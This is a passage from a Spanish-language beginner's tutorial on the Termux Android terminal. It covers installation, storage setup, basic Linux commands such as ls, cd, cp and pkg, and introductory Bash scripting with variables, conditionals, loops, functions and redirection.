distribución de Linux. Los paquetes se compilan de forma cruzada con Android NDK y en la mayoría de casos solo necesitan añadirle pequeños parches para que sean totalmente compatibles con Android. Hay miles de paquetes disponibles y cada día la comunidad añade nuevos paquetes. Es seguro, ya que todo es código abierto y miles de profesionales revisan el código y los nuevos cambios a diario. Tiene un montón de características extra, como poder ver los SMS, los archivos del dispositivo, etc. Esto te premite automatizar un montón de tareas, hacer interfaces con distintas tecnologías y todo lo que se te ocurra. Totalmente customizable. Puedes modificar la apariencia, añadir atajos de teclado, nuevas funcionalidades... Soporta teclado y ratón externos. Puedes conectar Termux a una pantalla externa y utilizar un teclado y un ratón. #### Cómo funciona? La terminal emulada es básicamente una aplicación que arranca los programas de linea de comandos usando una llamada del sistema [execve(2)](https://www.man7.org/linux/man-pages/man2/execve.2.html) y redirige la entrada y la salida de datos de la función, hacia la pantalla. La mayoría de terminales para Android, trabajan con conjuntos de herramientas pobres que ya trae Android. Termux porta una gran cantidad de herramientas de GNU/Linux hacia Android. Termux no es una máquina virtual ni otro tipo de sistema/entorno emulado. Todos los paquetes son compilados en cruce con Android NDK y solo se parchean para que funcionen en Android/Termux. El sistema operativo no proporciona acceso completo al sistema de ficheros, por lo cual Termux no puede instalar los paquetes en las rutas típicas /bin, /etc, /usr, /var. Termux traslada este sistema de ficheros a un directorio privado de la aplicación en la ruta /data/data/com.termux/files/usr Este directorio se llama **prefix** y su ruta se puede visualizar en la variable de entorno "$PREFIX". Esta ruta se hardcodea directamente en muchos de los binarios/paquetes disponibles para Termux. Esto es uno de los típicos parches que se añaden. [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capitulo 2: Descarga e Instalación ### Descarga Puedes instalar Termux descargando la última [release](https://github.com/termux/termux-app/releases) directamente desde el repositorio del proyecto en github. O desde la tienda de [F-Droid](https://f-droid.org/en/packages/com.termux/). La descarga también está disponible en Play Store, pero descargar la app de la Play Store NO SE RECOMIENDA. El motivo está relacionado con políticas de Google con respecto a dar soporte a nuevas versiones de Android. Si se cumpliese con dichas políticas, habría que dejar de dar soporte a versiones anteriores. [Aquí mas detalles](https://github.com/termux/termux-app#google-play-store-deprecated). Si no conoces la arquitectura de tu dispositivo, puedes pinchar [aquí](https://stringmanolo.github.io/hackingTermux101/paginas/mostrarArch.html). ### Instalacion - Abre F-Droid en tu Android pinchando [aquí](https://f-droid.org/packages/com.termux/) - Pincha en el primer enlace que dice [Descargar Apk]() - Pincha en el archivo descargado para iniciar la instalación - Pincha en Permitir instalación de aplicaciones desde orígenes desconocidos - Espera a que se complete la instalación - Cuando finalice la instalación tendrás el icono de Termux en tu escritorio, haz click para arrancar la app. [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 3: Configuración Básica Una vez tienes la consola de comandos ante ti, lo primero es configurar el acceso al sistema interno de ficheros de Android. Para ello debes correr el comando ```bash termux-setup-storage ``` Y permitir el acceso de termux al sistema interno de ficheros. ![Imagen de Android que pide permisos de acceso al espacio interno de ficheros](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/termux-setup-storage.png) El comando **termux-setup-storage** va a configurar el acceso a las siguientes carpetas. * ~/storage/shared Carpeta utilizada por las aplicaciones de Android para compartir archivos * ~/storage/downloads La carpeta por defecto de descargas, por ejemplo donde tu navegador descarga los archivos. * ~/storage/dcim Aquí la cámara suele almacenar las fotos y videos del dispositivo * ~/storage/pictures En esta carpeta se suelen almacenar imágenes del dispositivo * ~/storage/music Esta es la carpeta que Android suele utilizar para guardar la música del usuario * ~/storage/movies Donde se suelen almacenar las películas * ~/storage/external-1 Carpeta especial creada por Termux en el almacenamiento externo (si este está disponible), normalmente una tarjeta micro-sd, aunque se permite también el acceso a pendrives y otro tipo de dispositivos de memoria externos. No instales paquetes, programas o archivos de programas aquí (como puedan ser logs de un servidor, archivos de configuración, ...) , ya que Android no proporciona permisos de escritura/lectura directamente y es necesario utilizar una API a la que los programas no tienen acceso. Si utilizas Android 11 y se muestra el error __Permission denied__ (Permiso denegado) cuando intentas acceder a la carpeta shared, aún cuando le diste permisos, sigue los pasos siguientes: - Ve a Ajustes -> Aplicaciones -> Termux -> Permisos - Revoca el permiso de acceso a ficheros (Storage permission) - Autoriza de nuevo el permiso de acceso a ficheros. Este es un bug de Android 11, no de Termux. > Nunca elimines Termux directamente desde Android, ya que si tienes archivos en la tarjeta sd, todo su contenido será eliminado, incluyendo archivos que no tienen ninguna relación con Termux [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 4: Uso básico de la terminal Una terminal es una interfaz conducida por comandos capaz de realizar todo tipo de tareas. Usualmente realizamos las tareas utilizando interfaces, esto es, pulsando botones, arrastrando carpetas, viendo la información en forma de imágenes e iconos... La terminal utiliza un modelo completamente distinto, remplazando los iconos, las imágenes, los botones y toda la gestión de ficheros por comandos y texto que se muestra en pantalla. Utilizar una terminal en lugar de una interfaz gráfica, nos permite realizar tareas de todo tipo de forma mas ágil y rápida. Todas las terminales de GNU/Linux, así como Termux, incluyen una gran variedad de comandos básicos que nos permiten realizar estas tareas. Este capítulo se enfoca en los comandos más básicos de Linux. Al entrar en Termux, veremos un **$** que indica el "prompt" de la terminal, en Bash se guarda en la variable de entorno "$PS1". Este caracter del dolar, nos indica que podemos escribir comandos en la terminal. La sintaxis es **$ comando**, para enviar el comando y que este sea procesado, pulsamos la tecla Enter. En caso de Hacker's Keyboard, esta tecla se representa como una flecha situada en la esquina inferior derecha **⏎**. ### Comandos básicos de Linux #### pwd El comando **pwd** nos va a mostrar la ruta completa de la carpeta en la cual nos encontramos. ![Salida del comando pwd](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/pwd.jpg) > pwd son las siglas de Print Working Directory (Imprime Directorio de Trabajo) #### cd El comando **cd** sirve para cambiar el directorio en el cual estamos trabajando. Es el equivalente a moverse a una carpeta haciendo doble-click en ella desde cualquier interfaz gráfica. Si escribes el comando cd sin mas, se cambiará el directorio a la variable de entorno "$HOME", por defecto /data/data/com.termux/files/home. > Existe un símbolo especial **~** que sirve para indicar explícitamente que nos mueva a la carpeta home. Esto nos será útil cuando queramos crear o referenciar un archivo en home desde otro directorio. Podemos movernos a cualquier directorio alcanzable poniendo su ruta relativa tras el comando cd, o poniendo su ruta absoluta desde cualquier lugar. En la siguiente imagen puedes comprobar como se cambia el directorio a la carpeta __ejemplo__, que existe dentro de la carpeta home, y como después se imprime el directorio actual de trabajo. Indicándonos la terminal, que nos encontramos dentro de la carpeta ejemplo que existe en home. Cuando quieras moverte al directorio anterior utiliza dos puntos. ```bash cd .. ``` ![Salida del comando cd ejemplo y pwd](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/cd_ejemplo.jpg) > cd son las siglas de Change Directory (Cambia Directorio), #### ls El comando **ls** muestra la lista de archivos y carpetas que contiene el directorio actual de trabajo. ![Salida del comando ls y pwd](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/ls.jpg) En este ejemplo nos movemos al directorio home, desde ahí al directorio ejemplo que está dentro de home y con **ls** listamos todo lo que contiene el directorio actual. En blanco se muestran los archivos comunes (foto_perfil.jpg, listaDeLaCompra.txt), en azul/violeta se muestran los directorios que contiene el directorio __ejemplo__. En este caso hay un directorio llamado __documentosDelTrabajo__. En verde se muestran archivos con permisos de ejecución, en esta imagen no hay ninguno. > ls es una abreviatura de List (Listar) #### cat El comando **cat** muestra el contenido de un fichero. ![Salida del comando cat](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/cat.jpg) En este ejemplo se muestra el contenido del fichero listaDeLaCompra.txt. Es simplemente un texto que escribí en un fichero. La escritura de ficheros se detalla en el [capítulo 6: Uso de VI y de VIM](#cap%C3%ADtulo-6-uso-de-vi-y-de-vim). > cat viene de concatenate (concatenar) #### touch El comando **touch** crea ficheros vacios en el directorio actual. ```bash touch miListaDeLaCompra.txt ``` Con este comando crearás un archivo miListaDeLaCompra.txt en el directorio actual, que podras ver en el listado del directorio en el que crees el archivo. Por ejemplo si quisieses crear el archivo en home y listar el contenido de home, usarías los siguientes comandos: ```bash cd touch miListaDeLaCompra.txt ls ``` > touch significa tocar #### mkdir El comando **mkdir** crea directorios/carpetas vacias en el directorio actual. ```bash cd mkdir ejemplo ``` Con estes comandos crearás una carpeta (puedes usar el nombre de carpeta/directorio indistintamente) llamada __ejemplo__ dentro de la carpeta home. Puedes listarla con ls. Si intentas crear un nuevo directorio y un directorio hijo directamente, puede usar el argumento -p (de parents, en español directorios padres) ```bash mkdir ~/ejemplo/hijoDeEjemplo/hijoDeHijoDeEjemplo ``` > mkdir es una abreviatura de Make Directory (Crea Directorio) #### cp El comando **cp** permire copiar archivos. Puedes copiarlos en el mismo directorio o en otro directorio. Tambien puedes modificar el nombre de destino. ```bash cp miListaDeLaCompra.txt miSegundaListaDeLaCompra.txt ``` El primer argumento del comando **cp** es el nombre del fichero del que deseamos realizar una copia. El segundo argumento es el nuevo nombre que tendrá la copia. Si el archivo contiene texto o cualquier otro contenido, este estará presente en ambos archivos, tanto en el original como en la copia. La mayoría de comandos nos permite especificar las ruta junto al nombre de los ficheros. Si nos encontramos en la carpeta home, y dentro de esta tenemos una carpeta llamada ejemplo que contiene un archivo miListaDeLaCompra.txt, podemos copiar este archivo directamente desde la carpera home. El comando para realizar esta acción sería: ```bash cd cp ejemplo/miListaDeLaCompra.txt listaDeLaCompra.txt ``` Tras este comando tendremos una copia del archivo miListaDeLaCompra.txt (que se encuentra en la carpeta ejemplo) en la carpeta home con el nombre de listaDeLaCompra.txt > cp es una abreviatura de copy (copiar) #### mv El comando **mv** permite mover archivos. El funcionamiente es exactamente igual al del comando **cp**, con la diferencia de que el archivo original es eliminado y solo se conserva la nueva copia. Esto hace de **mv** el comando ideal para mover archivos entre directorios. > mv es una abreviatura de move (mover) #### rm El comando **rm** se utiliza para eliminar archivos de forma permanente. ```bash cd rm listaDeLaCompra.txt ``` > rm es una abreviatura de remove (eliminar) #### clear El comando **clear**, limpia el contenido de la pantalla. ```bash clear ``` > clear significa limpiar #### pkg El comando **pkg** es único de Termux, no existe en GNU/Linux, aunqie si existen sus equivalentes. Este comando se encarga de gestionar por nosotros toda la instalación de paquetes, sus versiones, actualizaciones, dependencias, ... Si corres el comando: ```bash pkg ``` Te mostrará la lista de subcomandos que soporta y una breve descripción de que hace cada uno. Aquí me limito a explicar los subcomandos mas básicos: * ##### pkg list-all Muestra un listado todos los comandos/programas/paquetes disponibles para instalar. El listado es bastante grande. ```bash pkg list-all ``` * ##### pkg list-installed Muestra el listado de los comandos que ya están instalados en tu Termux. Este listado solo hace referencia a paquetes que se han instalado por **pkg**. Esto significa que no verás en la lista comandos como cp, cat, mv, ls, ... También significa que puedan aparecer algunos paquetes que tu no instalases. Por ejemplo si instalas una herramienta que utiliza una base de datos, es común que en el listado te aparezcan tanto la herramienta que descargaste como la base de datos. Esto sucede porque pkg se encarga de bajar las dependencias necesarias (para que las herramientas funcionen) por su cuenta. ```bash pkg list-installed ``` * ##### pkg show Muestra información adicional incluyendo una breve descripción sobre el paquete que se indique. Puedes utilizar el nombre de cualquiera de los paquetes listados con los 2 anteriores subcomandos ```bash pkg show unzip ``` El comando **pkg show unzip** nos muestra esta descripción para el comando unzip. ``` Package: unzip Version: 6.0-7 Maintainer: Termux members @termux Installed-Size: 340 kB Depends: libbz2 Homepage: https://sourceforge.net/projects/infozip/ Download-Size: 115 kB APT-Manual-Installed: yes APT-Sources: https://termux.org/packages stable/main aarch64 Packages Description: Tools for working with zip files ``` En este ejemplo la información que se nos muestra indica: - El nombre del paquete - La versión del programa - Las personas/organización que se encargan de gestionar este paquete - El tamaño que ocupará en el sistema una vez instalado - Otros paquetes que necesita para funcionar - La página oficial del programa (o repositorio de su código fuente) - El tamaño de la descarga comprimida - Si se instaló manualmente - Repositorio donde está el paquete listado - Descripción de que es el paquete Si tienes la opción de buscar en Google el paquete, te será de mas ayuda para saber exactamente para que sirve. * ##### pkg install Instala un comando en Termux. ```bash pkg install tree ``` Una vez instalado, ya podras utilizarlo. Es posible que se muestre un error si el repositorio por defecto no está disponible. Si este es tu caso, corre el comando termux-change-repo. Presiona enter sobre Main Repository para poder ver un listado de los servidores disponibles y cambia el servidos moviéndote por el listado hacia abajo, presionando espacio para marcar tu selección y enter para guardar los cambios. Tree es similar a ls pero también muestra todos los subdirectorios. ```bash tree ``` * ##### pkg uninstall Desinstala un comando en Termux. ```bash pkg uninstall tree ``` Una vez desinstalado, se borrará permanentemente del sistema el comando que hayas escrito en este caso tree. Si intentas volver a utilizarlo tras desinstalarlo, verás que ya no existe. Puedes borrarlo si quieres, siempre podrás volver a instalarlo si lo necesitas. * ##### pkg upgrade Actualiza todos los paquetes instalados. ```bash pkg update ``` > Si tienes espacio de sobra, es recomendado que todos los días actualices tus comandos usando **pkg upgrade** Las actualizaciones, sirven principalmente para mantener tus paquetes seguros. > Cuando un programador o hacker, encuentra un fallo de seguridad en un programa, se programa un código (parche de seguridad). Cuando tu le das a actualizar, se instalan estos parches automáticamente. También se instalan parches de mejoras de rendimiento para que los comandos se ejecuten mas rápido o utilicen menos batería, asi como también nuevas funcionalidades. #### man El comando **man** sirve para mostrar el manual de un comando, si lo tiene. ```bash man ls ``` Con **man ls** se nos muestra el manual para el comando ls, con todas sus opciones extra. > man son la iniciales de manual Para salir de man utiliza la combinación de teclas **ESC : q** #### exit Cierra la terminal #### Argumentos Los comandos de GNU/Linux aceptan argumentos especiales que van precedidos de guiones. Hay 2 formas de argumentos con guiones. La forma corta y la forma léxica del argumento. La forma corta es siempre una letra, normalmente la inicial de la forma léxica. Uno de los argumentos que vamos a encontrar presentes en prácticamente todos los comandos es **-h**. Versión corta de **--help**. Normalmente podemos acompañar nuestros comandos de cualquiera de estos indistintamente, aunque no hay ninguna norma escrita y muchos desarrolladores muestran distintos mensajes de ayuda según utilizas la versión corta o la léxica. Yo suelo dar prioridad a las opción léxica del argumento help. ```bash ls --help ``` [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 5: Introducción a Bash Bash es una shell de comandos. Todos los comandos que usamos hasta ahora, han sido enviados a Bash y Bash es quien se ha encargado de interpretarlos y llamar a los paquetes correspondientes. Se encarga de procesar el texto que le introducimos y el símbolo dolar **$** nos está indicando que se trata de una Shell normal. > En Linux cuando eres root usando el comando **sudo su** el dolar se cambia por un hash (asterisco) #. En Android no disponemos de root por defecto, y este libro asume que no eres root. Es posible obtenerlo, pero yo no lo recomiendo en Android por motivos de seguridad del sistema. Bash no es un simple intérprete, si no que admite un gran número de instrucciones muy diversas y tambien algunas complejas, dando lugar a un lenguaje de programación potente ampliamente utilizado para configurar sistemas GNU/Linux, crear comandos y otro tipo de utilidades. #### Variables Las variables te permiten almacenar valores para poder utilizarlos mas adelante. Para almacenar texto en una variable usaremos la siguiente sintaxis **nombreDeLaVariable**="__valorDeLaVariable__" ```bash miNombre="Manolo" ``` También es posible almacenar el resultado de un comando en la variable utilizando la sintaxis **nombreDeLaVariable**=__$(comando argumentos)__ ```bash listaArchivosEnHome=$(ls ~) ``` Podremos referenciar la variable anteponiendo el símbolo del dolar al nombre de la variable, como veremos en el siguiente apartado. #### Imprimir en pantalla Para imprimir texto o el contenido de variables (en este caso en pantalla) podemos utilizar echo o printf. ##### echo echo es un comando sencillo para imprimir texto ```bash miNombre="Manolo" echo "Hola, mi nombre es $miNombre" ``` Puedes usar variables como en el ejemplo anterior, y también comandos: ```bash echo "Hola, te encuentras en el directorio $(pwd)" ``` Si quieres que se imprima un salto de linea, puedes anteponer el argumento simple -e del texto. Y en el texto incluyes la secuencia de caracteres \n para indicar un salto de linea. ```bash echo "$(clear)\n\n\n\n\n\n\n\n\n\nHola, te encuentras en el directorio\n$(pwd)\nNo es genial\n?\n\n" ``` ![Salida del comando echo en multiples lineas](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/echo.jpg) ##### printf printf hace lo mismo que echo pero se ejecuta mas rápido y permite mas opciones para formatear el texto. ```bash miNombre="Manolo" printf "Hola, mi nombre es %s" "$miNombre" ``` Con respecto a echo, puedes apreciar que no se añade el salto de linea al final de la frase. Tienes que añadirla manualmente. También ves en el comando que las variables se separan en otros argumentos a parte. En este caso %s indica que la variable es un string (cadena de texto). Otra de las ventajas de printf, es que nos avisa de errores. Por ejemplo %d sirve para imprimir numeros enteros. Si le pasamos como argumento un numero que no es entero, nos avisará del error ```bash numeroPI="3.1416" printf "El numero PI es %d" "$numeroPI" ``` Bash nos indicará el error: **bash: printf: 3.1416: invalid number** e imprimirá solo la parte entera. Esta es la lista de tipos que acepta: | secuencia | tipo | descripción | | --- | --- | --- | | %d | digit | Números enteros | | %f | float | Números flotantes (numeros con decimales) | | %s | string | Cadena de texto | | %x | hexadecimal | Imprime un número en hexadecimal | | %X | hexadecimal | Imprime un número en hexadecimal (letras en mayúsculas) | #### Leer de la terminal Podemos interactura con el usuario de múltiples formas. ##### read El comando **read** nos permite leer datos de la entrada de la terminal. Nosotros usaremos read con el argumento simple -p (la p es de la palabra prompt, en español sugerencia) y nos srive para sugerir al usuario el tipo de datos que queremos que introduza. Si por ejemplo queremos preguntarle el nombre al usuario ```bash read -p "Cómo te llamas? " nombre echo "Tu nombre es $nombre" ``` En este ejemplo vemos que readme se parece a echo, pero admite un argumento extra, que será el nombre de la variable en la cual queremos que se guarden los datos que introduzca el usuario. > read significa leer #### Condicionales Los condicionales permiten realizar acciones si se cumple una condición. **if [ condición ]; then comando fi**. En español se traduciría a algo similar a **sì [ seCumpleEstaCondición ]; entonces ejecutaEsteComando fin**. Podemos ver un ejemplo. ```bash read -p "Introduce tu edad y pulsa enter: " edad if [ "$edad" -gt 17 ]; then echo "Eres mayor de edad" fi ``` En este ejemplo tenemos: - Un read Almacena la edad que introduce el usuario en la variable edad. - La palabra clave if Indica que la expresión es un condicional - Unos corchetes (que también son comandos, aunque no lo parezcan) Evaluan la siguiente expresión y delimitan donde empieza ([) y acaba (]) la condición - El punto y coma (;) Sirve para indicar el final de los comandos asociados a if - La palabra then Indica que a continuación vienen las instrucciones que queremos que se ejecuten si se ha cumplido la condición. - Un echo que imprime un texto Aunque podría ser cualquier otro comando, asignación de variables, etc. - Y la palabra fi (es if al revés) Indica el final del condicional La condición **"$edad" -gt 17** está compuesta de 3 elementos: - "$edad" Es una variable que contiene la edad del usuario - -gt Es un operador especial de Bash, siglas de Greater Than (Mayor Que). Sería equivalente al operador matemático **>** - 17 Si la edad del usuario es mayor que 17, entonces es mayor de edad (18 años o más en mi país) Recuerdas que te dije que **[** era un comando mas? Igual que echo o printf. Pues **[** también tiene argumentos. Hay distintos tipos de condiciones, aquí un listado de las mas comunes: ```bash [ -a listaDeLaCompra.txt ] ``` Se cumple si el archivo existe &nbsp; ```bash [ -d ejemplo ] ``` Se cumple si la carpeta existe &nbsp; ```bash [ -f listaDeLaCompra.txt ] ``` Se cumple si el archivo existe y es un archivo normal &nbsp; ```bash [ -s listaDeLaCompra.txt ] ``` Se cumple si el archivo existe y no está vacio &nbsp; ```bash [ listaDeLaCompra.txt -nt otraListaDeLaCompra.txt ] ``` Se cumple si el primer archivo es mas reciente que el segundo > nt abreviado de newer than (mas nuevo que) &nbsp; ```bash [ listaDeLaCompra.txt -ot recetaChurros.txt ] ``` Se cumple si el primer archivo es mas viejo que el segundo > ot abreviado de older than (mas viejo que) &nbsp; ```bash [ -z "$nombre" ] ``` Se cumple si la variable está vacia &nbsp; ```bash [ -n "$nombre" ] ``` Se cumple si la variable no está vacia &nbsp; ```bash [ "$nombre" = "Paco" ] ``` Se cumple si el contendio de la variable **$nombre** es **Paco** &nbsp; ```bash [ "$nombre" != "Paco" ] ``` Se cumple si el contenido de la variable **$nombre** no es **Paco** &nbsp; ```bash [ "$nombre" < "Paco" ] ``` Se cumple si el contenido de la variable **$nombre** se posiciona antes que Paco, alfabéticamente &nbsp; ```bash [ "$nombre" > "Paco" ] ``` Se cumple si el contenido de la variable **$nombre** se posiciona después que Paco, alfabéticamente &nbsp; ```bash [ -v "$nombre" ] ``` Se cumple si la variable existe &nbsp; ```bash [ ! condicion ] ``` Se cumple si la condición no se cumple &nbsp; ```bash [ condicion -o otraCondicion ] ``` Se cumple si cualquiera de las 2 condiciones se cumple (o ambas se cumplen) &nbsp; ```bash [ condicion -a otraCondicion ] ``` Se cumple solo si ambas condiciones se cumplen &nbsp; ```bash [ 7 -eq 7 ] ``` Se cumple si el primer número es igual al segundo (recuerda que puedes usar variables) > eq de equals (igual a) &nbsp; ```bash [ 7 -ne 7 ] ``` Se cumple si el primer número es distinto al segundo > ne de not equal (no igual a) &nbsp; ```bash [ 7 -lt 7 ] ``` Se cumple si el primer numero es menor que el segundo > lt de less than (menor que) &nbsp; ```bash [ 7 -le 7 ] ``` Se cumple si el primer número es menor o igual al segundo > le de less equal (menor o igual a) &nbsp; ```bash [ 7 -gt 7 ] ``` Se cumple si el primer número es mayor que el segundo > gt de greater than (mayor que) &nbsp; ```bash [ 7 -ge 7 ] ``` Se cumple si el primer número es mayor o igual que el segundo > ge de greater equal (mayor o igual a) &nbsp; A parte de if, hay un par de palabras mas que podemos utilizar en los condicionales. El comando **else** permite ejecutar comandos si la condición no se ha cumplido. Queda mas claro con un ejemplo: ```bash read -p "Introduce tu edad y pulsa enter: " edad if [ "$edad" -gt 17 ]; then echo "Eres mayor de edad" else echo "Eres menor de edad" fi ``` Si pruebas el ejemplo pegándolo en tu terminal y pulsando enter, verás que si se cumple la condición mostrará el texto indicando que eres mayor de edad, y si no se cumple, te dirá que eres menor de edad. La última palabra clave es **elif**, y sirve para introducir mas if, que se ejecutarán solo si el anterior **if** no se cumple. Ejemplo: ```bash read -p "Introduce tu edad y pulsa enter: " edad if [ "$edad" -lt 12 ]; then echo "Eres un niño" elif [ "$edad" -lt 18 ]; then echo "Eres un adolescente" elif [ "$edad" -lt 65 ]; then echo "Eres un adulto" else echo "Eres un anciano" fi ``` En español esto viene diciendo: ```bash si (tienes menos de 12 años) entonces muestra "Eres un niño" en caso contrario, si (tienes menos de 18 años) entonces muestra "Eres un adolescente" en caso contrario, si (tienes menos de 65 años) entonces muestra "Eres un adulto" en caso contrario muestra "Eres un anciano" ``` El comando *case* es una forma distinta de crear condicionales, en otros lenguajes se le conoce como **switch** o también **switch case** y se utiliza principalmente cuando quieres comprobar la variable con valores concretos ```bash printf "1. Imprimir Directorio Actual\n2. Listar ficheros \n3. Crear Archivo\n4. Crear Carpeta\n\n0. Salir\n\nSelecciona el número correspondiente a tu opción -> " read opcion case $opcion in 1) echo $(pwd) ;; 2) echo $(ls) ;; 3) read -p "Introduce el nombre que tendrá el nuevo fichero: " nombreFichero touch $nombreFichero ;; 4) read -p "Introduce el nombre que tendrá el nuevo directorio: " nombreDirectorio mkdir $nombreDirectorio ;; 0) echo "Adios" ;; *) echo "La opción que elegiste no existe" ;; esac ``` #### Bucles Los bucles nos permiten correr un comando/realizar una tarea de forma repetida. Existen 4 tipos de bucles basicos en Bash. Los bucles **while**, **until**, **for** y **select**. ##### while El comando **while** permite ejecutar comandos mientras la condición sea verdadera. Su sintaxis es similar a la del condicional **if**. Ejemplo: ```bash read -p "Introduce tu contraseña: " contra while [ "$contra" != "admin123" ]; do read -p "La contraseña '$contra' es incorrecta. Inténtalo de nuevo: " contra done echo "Acceso Permitido" ``` > Si no supieses la contraseña, no sabrías como salir del programa. Cuando quieras cancelar la ejecución de un programa que está en bucle, presiona las teclas **CTRL** y **c**. Si no funciona, prueba con las teclas **CTRL** y **d**. Otro tipo de bucles comunes son los bucles infinitos ```bash while [ true ]; do date sleep 8s done ``` En este ejemplo vamos a mostrar la fecha cada 8 segundos. ##### until El bucle **until** es prácticamente igual al bucle **while**, con la diferencia de que se ejecutará mientras no se alcance la condición. ```bash read -p "Introduce tu contraseña: " contra until [ "$contra" = "admin123" ]; do read -p "La contraseña '$contra' es incorrecta. Inténtalo de nuevo: " contra done echo "Acceso Permitido" ``` > Puedes usar while o until indistintamente. Until existe simplemente porque puede ser mas sencilla de leer la expresión en inglés. Los ejemplos anteriores en español dirían; Para **while**: > Mientras (laContraseña no es igual a "admin123") haz ... Para **until**: > Hasta que (laContraseña no sea igual a "admin123") haz ... ##### for El bucle for sirve principalmente para recorrer elemenos. Los elementos pueden ser frases, palabras, secuencias numéricas, etc. ```bash frase="Hola me llamo Manolo" echo "La frase '$frase' tiene las siguientes palabras:" for palabra in $frase; do echo "$palabra" done ``` Lo mismo que haces con palabras, puedes hacerlo directamente con la salida de comandos. Da mucho juego ```bash for archivo in $(ls ~); do echo "$archivo" done ``` &nbsp; También puedes recorrer rangos de números ```bash echo "Los números del 1 al 20 son:" for numero in {1..20}; do printf "%d, " $numero done ``` &nbsp; Si queremos omitir la última coma tras el 20, podemos usar un condicional: ```bash echo "Los números del 1 al 20 son:" for numero in {1..20}; do if [ "$numero" -ne 20 ]; then printf "%d, " $numero else printf "%d" $numero fi done ``` Hay otra forma de usar el **for** que le será familiar a quien utilice el for en otros lenguajes de programación. Esta versión del **for** se le conoce como **for clásico** ```bash for ((i=1; i <= 10; i++)) do echo "$i" done ``` Algunos lenguajes de programación no disponen del bucle **for clásico**, pero si tienen el **while**. Hay una forma simple de conseguir esta misma funcionalidad con el bucle **while** ```bash i=1 while [ $i -le 10 ]; do echo "$i" ((++i)) done ``` ##### select El bucle **select** es un tipo de bucle ideal para hacer menus de forma sencilla. ```bash opciones="Sumar Restar Multiplicar Dividir Salir" select opcion in $opciones; do if [ "$opcion" = "Salir" ]; then echo "Adios" break fi read -p "Introduce el primer número: " primerNumero read -p "Introduce el segundo número: " segundoNumero if [ "$opcion" = "Sumar" ]; then resultado=$(( $primerNumero + $segundoNumero )) elif [ "$opcion" = "Restar" ]; then resultado=$(( $primerNumero - $segundoNumero )) elif [ "$opcion" = "Multiplicar" ]; then resultado=$(( $primerNumero * $segundoNumero )) elif [ "$opcion" = "Dividir" ]; then resultado=$(( $primerNumero / $segundoNumero )) else resultado="Opcion incorrecta." fi echo "El resultado es $resultado"; done ``` En este ejemplo podemos ver una calculadora simple en Bash. A destacar la palabra **break** que sirve para salir de cualquier tipo de bucle. ##### funciones Las **funciones** en Bash nos permiten agrupar varias instrucciones bajo el mismo nombre y son similares a los comandos en su uso. Para crear una función: ```bash saludar() { echo "hola $1, bienvenido a mi programa" } ``` De esta forma creamos una función que podremos reusar las veces que queramos. La principal utilidad de las funciones es reducir el tamaño del código. ```bash saludar() { echo "hola $1, bienvenido a mi programa" } saludar "Manolo" saludar "Arturo" ``` Como puedes ver, puedes saludar a tantos usuarios como quieras sin necesidad de tener que escribir el mismo texto una y otra vez. Puedes poner cualquier tipo de comandos dentro de las funciones. Si quieres que quede mas claro que estás creando una función, puedes usar la palabra clave **function** y omitir los paréntesis: ```bash function saludar { echo "hola $1, bienvenido a mi programa" } saludar "Manolo" saludar "Arturo" ``` Puedes usar cualquier de las 2 formas, la que tu prefieras. A destacar el uso del dolar. Sirve para referenciar argumentos. $1 referencia el primer argumento. Puedes utilizar todos los que tu quieras: ```bash saludar() { echo "Quiero dar la bienvenida a $1, $2 y $3" } saludar "Manolo" "Arturo" "Jose" ``` #### Miscelanea (otros operadores) Bash permite realizar redirecciones entre comandos, salida a pantalla, entrada a comandos y ficheros. Una redirección es el envio de texto desde un fichero a otro. Todo lo que vemos en pantalla en realidad es enviado a un fichero de texto y Bash se encarga de imprimir su contenido para que lo veamos. ##### > El caracter **>** nos permite enviar la salida de un comando hacia un fichero. Si el nombre del fichero no existe, se creará uno nuevo. ```bash echo -e "Lista de la compra:\n2 paquetes de letejas\n1 cartón de leche" > ~/miListaDeLaCompra.txt ``` Con el **>** indicamos que en lugar de mostrar el texto en pantalla queremos que se mande al archivo __miListaDeLaCompra.txt__ que está ubicado en la carpeta **~** (home). Si el archivo no existe **>** se encarga de crearlo antes de volcar la salida del comando **echo**, y si este archivo ya existía en home, se le borrará todo el contenido antes de añadir el nuevo contenido Ahora puedes imprimir su contenido cuando quieras ```bash cat ~/miListaDeLaCompra.txt ``` > La extensión .txt no hace nada, ninguna extensión hace nada en particular. Solo se añaden para ayudar al usuario o a otros programas a intuir que tipo de datos puede contener el fichero. Otro uso común es ocultar la salida de un comando. Para ello redirigimos la salida a un archivo especial diseñado para ello. ```bash echo "Hola" > /dev/null ``` Redirigir a __/dev/null__ es una práctica común cuando queremos correr un comando pero no nos interesa lo que nos muestre. Puede ser el caso de un servidor de una página web cuando muestra los logs en pantalla y no nos interesan. Aunque redirigas la salida a __/dev/null__ los comandos siguen mostrando los errores en pantalla si estos se dan. Si quieres ocultar los errores, debes redirigir un archivo especial hacia __/dev/null__ ```bash cat esteArchicoNoExiste.txt 2>/dev/null ``` ##### >> Qué pasa si quiesieses añadir un nuevo producto a tu lista de la compra sin eliminar el contenido del fichero? Se utiliza el operador **>>** en lugar de **>**. Al igual que **>**, si no existe el fichero también se creará, pero si ya existe el fichero, en lugar de remplazar su contenido por el nuevo que indiquemos, se añadirá al que ya existe. ```bash echo -e "\n6 latas de mejillones" >> ~/miListaDeLaCompra.txt ``` > Puedes redirigir la salida de cualquier comando, no solo de echo ##### | El operador **|** sirve para redirigir la salida de un comando hacia otro comando. Existen una multitud de utilidades que son perfectas para su uso con **|** ```bash echo "Hola qué tal?" | wc ``` > El comando **wc** (word counter en español, contador de palabras) muestra el número de lineas, palabras y caracteres que tiene un texto. En este caso el texto lo pasamos del comando **echo** hacia el comando **wc** utilizando **|** ##### || El operador **||** (OR) sirve para ejecutar un comando si el anterior falla. ```bash cat esteArchivoNoExiste.txt || echo "El archivo no existe" ``` Es común redirigir los errores a __/dev/null__ y mostrar nuestros errores personalizados ```bash cat archivoQueNoExiste 2>/dev/null || echo "No se pudo mostrar el contenido del archivo" ``` ##### & El operador **&** sirve para crear 